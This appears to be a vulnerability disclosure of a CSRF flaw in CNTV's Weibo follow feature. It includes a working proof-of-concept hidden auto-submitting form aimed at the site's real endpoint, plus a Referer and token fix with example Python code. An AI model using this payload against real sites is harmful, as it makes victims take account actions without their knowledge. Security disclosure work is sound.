CSRF on the official China Network TV (CNTV) site
Recently, I visited CNTV and found a CSRF vulnerability. I then found that the CNTV Referer has no effect against CSRF.
Of course, there was no token to defend against CSRF either.
It is mainly used to gain Weibo followers ("fans") on the personal homepage.
1. I went to CNTV Weibo. I'd like to follow a female broadcaster first. Let's pick her. I heard she was the host of the Spring Festival Gala. Thank you!
2. Packet capture analysis. Haha, I didn't see a token field. Only the Referer is present. Let's test whether the Referer has any CSRF protection effect.
3. Create a hidden form yourself to simulate the user's submission: change the id to your own 364190xx, so that others "quietly" follow the original poster and become a "fan".
POC:
<form method='post' action='http://t.cntv.cn/?m=api/weibo/action.createFriendship&_=142288703327'>
  <input type='text' value='364190xx' name='uid' style='display:none!important;display:block;width=0;height=0' />
  <input type='text' value='0' name='type' style='display:none!important;display:block;width=0;height=0' />
</form>
<script>document.forms[0].submit();</script>
4. Save the page as HTML and use a Kali host for the experiment.
CSRF successful
Error = 0 indicates success
The effect is as follows. You can see on the homepage that the victim is now "following" my account.
Solution:
For CSRF, add Referer and token protection.
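
The combined Referer and token check named in the solution, as an added example that is not CNTV's code. The host comes from the PoC form's action URL; SECRET_KEY, the csrf_token field name and the function names are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SECRET_KEY = secrets.token_bytes(32)   # assumption: per-deployment server secret
TRUSTED_HOSTS = {"t.cntv.cn"}          # host taken from the PoC form's action URL


def issue_token(session_id: str) -> str:
    """Token bound to the session: random nonce plus HMAC(secret, session|nonce)."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SECRET_KEY, f"{session_id}|{nonce}".encode(), hashlib.sha256)
    return f"{nonce}.{mac.hexdigest()}"


def token_valid(session_id: str, token: str) -> bool:
    """Recompute the HMAC for this session and compare in constant time."""
    nonce, sep, sig = (token or "").partition(".")
    if not sep:
        return False
    mac = hmac.new(SECRET_KEY, f"{session_id}|{nonce}".encode(), hashlib.sha256)
    return hmac.compare_digest(mac.hexdigest().encode(), sig.encode())


def source_trusted(headers: dict) -> bool:
    """Prefer Origin, fall back to Referer; a missing header is rejected."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    # Exact host match, so look-alike hosts with the trusted name as a prefix fail.
    return parts.scheme in ("http", "https") and parts.hostname in TRUSTED_HOSTS


def allow_state_change(method: str, headers: dict, session_id: str, form: dict) -> bool:
    """Gate for actions such as createFriendship: POST, same-site source, valid token."""
    if method != "POST":
        return False
    if not source_trusted(headers):
        return False
    return token_valid(session_id, form.get("csrf_token", ""))
```

A request is accepted only when both checks pass, so a cross-site auto-submitting form fails even if one of the two is bypassed.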